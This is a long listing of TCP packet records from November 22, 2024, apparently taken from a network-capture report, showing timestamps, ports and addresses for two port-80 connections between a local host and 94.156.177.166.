Nov 22, 2024 14:17:34.443768024 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.443820953 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.448447943 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.448582888 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.448636055 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.453299999 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.453397036 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.453588009 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.458084106 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.458204985 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.458262920 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.462912083 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.462954998 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.463015079 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.467890024 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.468019962 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.468220949 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.472626925 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.472723007 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.472798109 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.477438927 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.477566004 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.477628946 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.482219934 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.482496023 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.482553005 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.487034082 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.487126112 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.487179041 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.491885900 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.491933107 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.491991043 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.496670008 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.497226954 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.497409105 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.501482010 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.501593113 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.501645088 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.506320953 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.506432056 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.506484032 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.511147976 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.511213064 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.511331081 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.617913008 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.617938042 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.617995977 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.619091988 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.619110107 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.619167089 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.622970104 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.623105049 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.623155117 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.626838923 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.626995087 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.627079964 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.630701065 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.630759954 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.630987883 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.634473085 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.634598970 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.634649992 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.638170004 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.638473034 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.638550997 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.641786098 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.641887903 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.641937971 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.645282030 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.645392895 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.645445108 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.648843050 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.649024010 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.649076939 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.652395964 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.652524948 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.652579069 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.655908108 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.655956984 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.656004906 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.659471035 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.659579992 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.659650087 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.663049936 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.663208008 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.663274050 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.666567087 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.666701078 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.666752100 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.670094967 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.670205116 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.670269012 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.673605919 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.673712969 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.673770905 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.677192926 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.677274942 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.677330017 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.680713892 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.680829048 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.680882931 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.684242964 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.684377909 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.684664965 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.687830925 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.688005924 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.688056946 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.691478968 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.691632986 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.691988945 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.695000887 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.695096016 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.695342064 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.698549032 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.698620081 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.698669910 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.702071905 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.702187061 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.702244997 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.705641031 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.705727100 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.705775976 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.709383965 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.709465027 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.709604025 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.712698936 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.712812901 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.712980032 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.716264963 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.716325045 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.716437101 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.719741106 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.719825029 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.719885111 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.723280907 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.723361015 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.723408937 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.726804018 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.771883965 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.810484886 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.810606956 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.810659885 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.811804056 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.811914921 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.811968088 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.814779043 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.814866066 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.814917088 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.817755938 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.817863941 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.817982912 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.820595980 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.820683956 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.820739031 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.823510885 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.823638916 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.823764086 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.826276064 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.881242990 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:39.308063030 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:39.308172941 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:42.058176994 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:42.059382915 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:42.177879095 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:42.178910971 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:42.178982973 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:42.179107904 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:42.301760912 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.572689056 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.572751045 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.572788000 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.572824955 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.572841883 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.572876930 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.572905064 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.572911024 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.572946072 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.572964907 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.573002100 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.573035955 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.573050976 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.573071957 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.573141098 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.696790934 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.697196960 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.697273016 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.773936987 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.773977041 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.774036884 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.778284073 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.778356075 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.778477907 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.786798954 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.786813974 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.786940098 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.795454025 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.796190023 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.796269894 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.803925991 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.803950071 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.804047108 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.812542915 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.812728882 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.816670895 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.821085930 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.821232080 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.821315050 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.829631090 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.829792976 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.829900026 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.838242054 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.838979959 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.839088917 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.846924067 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.848069906 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.848148108 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.855359077 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.855575085 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.855644941 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.894073009 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.975264072 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.975423098 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.975497007 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.977905035 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.978921890 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.978988886 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.983198881 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.983443022 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.983531952 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.988416910 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.988640070 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.988672018 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.993567944 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.993676901 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.993769884 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:43.998539925 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.998713017 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:43.998776913 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.003596067 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.003608942 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.003667116 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.008626938 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.008781910 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.008872986 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.014121056 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.014188051 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.014266968 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.018735886 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.018749952 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.018820047 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.023811102 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.023997068 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.024090052 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.028877974 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.028889894 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.028950930 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.033904076 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.034487963 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.034569979 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.038964987 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.039450884 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.039527893 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.044034958 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.044048071 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.044106007 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.049019098 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.049078941 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.049418926 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.054089069 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.054155111 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.054851055 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.059078932 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.059091091 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.059132099 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.176450014 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.176461935 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.176521063 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.178464890 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.178477049 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.178518057 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.182507038 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.182586908 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.184325933 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.184340000 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.184395075 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.188127995 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.188141108 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.188198090 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.192217112 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.192300081 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.192450047 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.196141958 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.196300030 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.196470022 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.200120926 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.200289011 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.200611115 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.204072952 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.204235077 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.204288960 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.208034992 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.208410978 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.208466053 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.212045908 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.212368011 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.212424994 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.215953112 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.216159105 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.216267109 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.219902039 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.220172882 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.220220089 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.223876953 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.224185944 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.224240065 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.227832079 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.227978945 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.228029013 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.231853008 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.232145071 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.232203007 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.235764980 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.235867977 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.235914946 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.239774942 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.240227938 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.240326881 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.243731976 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.243890047 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.244148016 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.247755051 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.248248100 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.248291016 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.251734972 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.252510071 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.252563953 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.255647898 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.255762100 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:44.255815983 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:44.259530067 CET	80	49750	94.156.177.166	192.168.2.7
